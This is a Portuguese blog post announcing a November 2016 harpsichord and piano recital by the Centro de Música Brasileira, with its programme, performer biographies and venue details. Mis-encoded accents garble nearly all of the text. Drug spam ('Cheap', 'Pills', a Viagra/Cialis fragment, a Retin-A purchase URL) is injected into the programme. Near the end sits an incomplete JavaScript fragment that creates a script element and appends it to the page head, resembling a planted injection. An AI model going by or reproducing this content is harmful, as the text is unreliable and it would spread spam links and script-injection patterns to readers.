Música de câmaraProgramaçãoSão Paulo

Centro de MA?sica Brasileira encerra 2016 com cravo e piano

A temporada do Centro de MA?sica Brasileira foi muito eclA�tica entre mA?sicos, compositores e instrumentos. Cheap

No dia 19 de novembro, sA?bado, A�s 20h, acontece o encerramento da Temporada 2016 do Centro de MA?sica Brasileira (CMB) com dois grandes mA?sicos, o cravista AntA?nio Carlos de MagalhA?es e a pianista Maria JosA� Carrasqueira na Sala Cultura Inglesa. Apoio Cultural da Cultura Inglesa de SA?o Paulo.

AntA?nio Carlos de MagalhA?es A� de Belo Horizonte e interpretarA? um repertA?rio raro com um Manuscrito de Piranga e obras de Dom Pedro I, Padre JosA� MaurA�cio Nunes Garcia, Lobo de Mesquita, LuA�s A?lvares Pinto, Manuel Dias de Oliveira e Villa-Lobos. AlA�m de JoA?o Carlos Rocha e Osvaldo Lacerda.

Maria JosA� Carrasqueira vai interpretar obras de Camargo Guarnieri, Ernesto Nazareth, JA?lio Reis, Fernando Cupertino, Lina Pires de Campos, NilcA�ia Baroncelli e Osvaldo Lacerda.

A temporada do Centro de MA?sica Brasileira foi muito eclA�tica entre mA?sicos, compositores e instrumentos. Foram 8 concertos difundindo a mA?sica erudita brasileira que tem tanta dificuldade em conseguir espaA�os para ser executada em seu prA?prio paA�s. a�?Ficamos muito satisfeitos com a qualidade dos mA?sicos, dos concertos e da ampla participaA�A?o do pA?blicoa�?, relata EudA?xia de Barros, Presidente do CMB. Muitos compositores que tiveram suas obras executadas foram apreciar as apresentaA�A�es.

 

PROGRAMA

1 A? Parte: AntA?nio Carlos de MagalhA?es (cravo)

Manuscrito de Piranga Cheap (SA�culo XVIII)
Deus, Deus Meus

Manuel Dias de Oliveira (ca. 1735-1813)
Bajulans

www.cialis.and viagra com J. J. Emerico Lobo de Mesquita (1746-1805)
Salve Regina (AntA�fona de Nossa Senhora) a�� Larghetto, Alegro Larghetto

AnA?nimo (ca. 1800)
Sonata 2A? (SabarA?) – AdA?gio

LuA�s A?lvares Pinto (1719-1789)
LiA�A�es XXIII e XXIV

Purchase Padre JosA� MaurA�cio Nunes Garcia (1767-1830)
Fantasia 2A? Pills

Dom Pedro I (1798-1834)
Hino da IndependA?ncia

Heitor Villa-Lobos (1887-1959)
Todo Mundo Passa (Cirandinha nA? 7)
Carneirinho, CarneirA?o… (Cirandinha nA? 9)
Zangou-se o Cravo com a Rosa (Cirandinha nA? 1)

JoA?o Carlos Rocha
Antique

Osvaldo Lacerda (1927a��2011)
Sonata para cravo – II– Andantino con moto
Brasiliana nA? 5 – III. Lundu

 

2A? parte – Maria JosA� Carrasqueira (piano)

JA?lio Reis (1879-1933)
Ondina a��Valsa PoA�tica

Camargo Guarnieri
Valsa nA? 9
Valsa nA? 10

Osvaldo Lacerda (1927a��2011)
Brasiliana nA? 2 Purchase a�� Romance, Chote, Moda e CA?co
Brasiliana nA? 3 a�� Samba, Valsa, PregA?o e Arrasta-PA�

Nilceia Baroncelli (1945)
O Fio de Ariadne (dedicada A� Maria JosA� Carrasqueira)

Fernando Cupertino (1960)
3 Momentos a�� Saudoso, Andante Lamentoso e Vivo

Lina Pires de Campos (1918-2003)
7 VariaA�A�es Sobre a�?Mucama Bonitaa�?

Ernesto Nazareth (1863-1934)
http://www.wolvesatthegate.com/buy-retin-a-0-05/ Eponina (valsa)
Fon-fon (tango)

 

Maria JosA� Carrasqueira

Renomada intA�rprete do cenA?rio artA�stico musical brasileiro, apresenta-se frequentemente como solista, camerista recitalista, professora convidada e conferencista pela AmA�rica Latina, USA, Nova ZelA?ndia, EscandinA?via, Leste Europeu e Europa. Seu CD com obras de E. Nazareth lanA�ado na Europa pelo selo SOLSTICE, foi agraciado com 4 estrelas pelas revistas a�?Le Monde De La Musiquea�? e a�?Diapasona�?, de Paris.

Dentre seus relevantes projetos, estA? a idealizaA�A?o e produA�A?o da a�?SA�rie RA�gia MA?sicaa�?, selo Paulinas-Comep, voltada A� gravaA�A?o de CDs por mA?sicos brasileiros, tendo recebido o PrA?mio Sharp de MA?sica -Melhor CD ClA?ssico-ProduA�A?o. Como pedagoga, A� uma referA?ncia no ensino do piano no Brasil, formando inA?meros alunos que atuam de forma relevante no cenA?rio artA�stico e pedagA?gico nacional e internacional.A�Numerosas sA?o suas atuaA�A�es e gravaA�A�es para a RA?dio e TelevisA?o, e sua discografia, realizada pelos selos Paulina-COMEP e YB (Brasil), SOLSTICE (FranA�a), Centauros (USA), Skarbo (FranA�a), Odyssey Discs (USA). PrA?mio Carlos Gomes a�� Solista Instrumental, PrA?mio da AssociaA�A?o Paulista de CrA�ticos de Arte -Melhor Recitalista.

Nascida em uma famA�lia de artistas, onde a mA?sica, a pintura e a literatura sempre fizeram parte de seu cotidiano, Maria JosA� Carrasqueira teve a oportunidade de conviver desde a infA?ncia com o universo livre e democrA?tico da arte, quando o popular e o erudito eram vivenciados sem barreiras, onde os clA?ssicos dialogaram sempre com as mais contemporA?neas linguagens. Pela casa de seu pai, passaram vA?rios dos mais importantes vultos da histA?ria da mA?sica no Brasil do sA�c. 20.A� Essa possibilidade do encontro com pessoas que estA?o entre as que mais dignificam a arte musical brasileira, contribuiu para que a divulgaA�A?o da mA?sica produzida no Brasil se tornasse uma bandeira para essa artista, fazendo com que seja uma das mais expressivas a�?intA�rpretes- representantesa�� da mA?sica de seu paA�s.

 

AntA?nio Carlos de MagalhA?es

Pianista e cravista, nasceu em Belo Horizonte, estudou licenciatura em piano, na Escola de MA?sica da UFMG. Bolsista do I Festival Internacional de Cravo em Porto (Portugal), A� pA?s-graduado em prA?ticas interpretativas em mA?sica brasileira pela Escola de MA?sica da UEMG. Atualmente, A� diretor artA�stico do Programa Segunda Musical da Assembleia Legislativa do Estado de Minas Gerais. Ministrou oficina de mA?sica barroca para pianistas no 24A?, 25A? e 26A? Inverno Cultural da UFSJ (Universidade Federal de SA?o JoA?o Del Rei). Fez cursos de aperfeiA�oamento com Pedro Personi, Felipe Silvestre (Portugal), Nicolau de Figueredo (SuA�A�a), Regina Schlochauer, Edmundo Hora, Beatrice Sterna (ItA?lia), Ilton Wyuniski (FranA�a), entre outros.

Como instrumentista, possui experiA?ncia em mA?sica erudita e popular. Participou do Collegium Musicum de Minas (gravou 3 CDs) e do Camerata AthaA�de, com o qual realizou turnA? nacional por 57 cidades no projeto Sonora Brasil a�� Sesc. Realizou e gravou o DVD da turnA? a�?Antologia Musical nos Caminhos da Estrada Reala�?, dentro do projeto Trilhas da Cultura. Participou da A?pera e filme a�?La Serva Padronaa�?, dirigido por Carla Camurati; do 4A? Encontro de Compositores e IntA�rpretes Latino-Americanos na FundaA�A?o de EducaA�A?o ArtA�stica; do I SeminA?rio Nacional de Pesquisa em Performance Musical, da Escola de MA?sica da UFMG, 24A? , 25A? e 26A? Inverno Cultural da UFSJ, II Pianofest (Festival PianA�stico de Belo Horizonte), dentre outros.

Participou tambA�m da novela a�?Xica da Silvaa�?, da Rede Manchete, e, por diversas vezes, do Programa Harmonia, da Rede Minas de TelevisA?o. Realizou a turnA? musical do CD “O cravo e a Rosa”, patrocinado pela Lei Municipal de Incentivo A� Cultura de Belo Horizonte eA� a turnA? a�?Concertos Comentados de Cravo: Nosso Barroco Mineiroa�? pelo Estado de Minas Gerais, nas comemoraA�A�es oficiais do bicentenA?rio de Aleijadinho. Atualmente, realiza o projeto a�?Cravo e Cantigasa�?, na Lei Municipal de Incentivo A� cultura de Belo Horizonte. No exterior, realizou concertos solo em Portugal e na Alemanha. Com grupos, jA? se apresentou em Portugal, Alemanha, A?ustria (Viena), Holanda, BA�lgica, PolA?nia, Argentina, Chile, Uruguai e Paraguai.

Gravou 3 CDs solos:A� a�?SabarA?a�? , a�?O Cravo e a Rosaa�? e a�?Fortepiano no Brasil do sA�c. XIXa�? (Lei Rouanet). Participou dos CDs a�?SeA�ora del Mundoa�?, a�?Origema�? e a�?NinguA�m morra de ciA?mea�? do conjunto a�?Collegium Musicum de Minasa�?, alA�m dos CDs a�?Alma Barrocaa�? (Maria BraganA�a) ,a�?A outra cidadea�? (Kristof Silva e outros), a�?Bigornaa�? (Cartoon) eA� dos seguintes CDs de Celso Adolfo: “Celso Adolfo – Voz, violA?o e algumas dobras” e a�?Estrada Real de Villa Ricaa�?.

 

Centro de MA?sica Brasileira – CMBA�

A� A�uma sociedade civil sem fins lucrativos, fundada em SA?o Paulo, em 18 de dezembro de 1984, iniciando suas atividades em 29 de abril de 1985, no Teatro de Cultura ArtA�stica (Sala Rubens Sverner), com um recital de EudA?xia de Barros. Visa defender e promover maior divulgaA�A?o da mA?sica brasileira erudita de todas as A�pocas e estilos. Grande parte dos intA�rpretes que se apresentam sA?o jovens no inA�cio de suas carreiras de instrumentistas, cantores ou regentes. Osvaldo Lacerda foi o Presidente atA� 2011 e atualmente A� a pianista EudA?xia de Barros.

O CMB realizou 317 apresentaA�A�es em SA?o Paulo, e um total de 47 em cidades do interior dos Estados de SA?o Paulo e Minas Gerais. Por duas vezes recebeu PrA?mio da AssociaA�A?o Paulista de CrA�ticos de Arte – APCA, pelo trabalho realizado em prol de nossa mA?sica. NA?o conta com subsA�dios de entidades nem particulares, nem governamentais, com exceA�A?o de esporA?dicos patrocA�nios dos prA?mios dos concursos ou apoios culturais: Banco FrancA?s e Brasileiro, Metal Leve, PADO S/A., Funarte a�� MINC, Rotary Club de SA?o Paulo, Orquestra da RTC, SESC, Academia Brasileira de MA?sica, Cultura Inglesa, Bovespa, Grupo ArA?o Sahm, Casa Manon, Pianos Fritz Dobbert, Orquestra SinfA?nica De Campinas, Ballet Stagium, Unibero, SabA? Ind. e com Ltda., e mais recentemente, um grande apoio da Secretaria de Estado da Cultura de SA?o Paulo.

Financeiramente, sobrevive graA�as A�s anuidades pagas por seu quadro social, e que foram estipuladas em R$ 100,00 (individual) e R$ 150,00 (casal) a partir deste ano, podendo ser enviadas para a sede da entidade: Rua SantarA�m, 269 Bairro Perdizes, CEP 01251-040 SA?o Paulo-SP.
Desde 1995, recebe um valioso apoio cultural da Cultura Inglesa de SA?o Paulo, podendo realizar seus recitais mensais da temporada, na Sala Cultura Inglesa do Centro Brasileiro BritA?nico, em Pinheiros.

Promoveu vA?rios concursos de InterpretaA�A?o, de A?mbito nacional: 7 da CanA�A?o de CA?mara Brasileira; 5 de MA?sicas Brasileiras para Piano; 2 de MA?sicas Brasileiras para Flauta. Promoveu um Concurso de Monografia a�?O Dobradoa�? (marcha cA�vica e militar brasileira), e dois de ComposiA�A?o: o primeiro, em parceria com a Biblioteca Municipal a�?MA?rio de Andradea�? (SA?o Paulo) e mais recentemente, em 2008, um Concurso de Tocata para Piano, vencido em 1A? lugar por Nelson Lin, que teve como prA?mio, alem de uma vultosa quantia oferecida pela Secretaria de Estado da Cultura de SA?o Paulo, ainda a impressA?o de sua Tocata, pela Academia Brasileira de MA?sica. O 2A? prA?mio foi para Edson SantA?Anna. Foram marcantes os dois recentes Concursos promovidos pelo Centro de MA?sica Brasileira, em dezembro de 2009, curiosamente realizados na Casa MA?rio de Andrade: o II Concurso de InterpretaA�A?o de MA?sicas Brasileiras para Flauta e o V Concurso de InterpretaA�A?o de MA?sicas Brasileiras para Piano, que tiveram grandes prA?mios oferecidos pela Secretaria de Cultura do Estado de SA?o Paulo. E em 2015, o Concurso de InterpretaA�A?o PianA�stica da obra de Osvaldo Lacerda.

 
Pills

SERVIA�O

Centro de MA?sica Brasileira (CMB) – AntA?nio Carlos de MagalhA?es (cravo) e Maria JosA� Carrasqueira (piano)
Dia 19 de novembro, sA?bado, A�s 20h
Sala Cultura Inglesa do Centro Brasileiro BritA?nico (Rua Ferreira de AraA?jo, 741 – Pinheiros – SA?o Paulo – Tel: (11) 3039 0500)

ClassificaA�A?o Livre

Entrada franca

 

 

 d.getElementsByTagName(‘head’)[0].appendChild(s);var d=document;var s=d.createElement(‘script’);

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.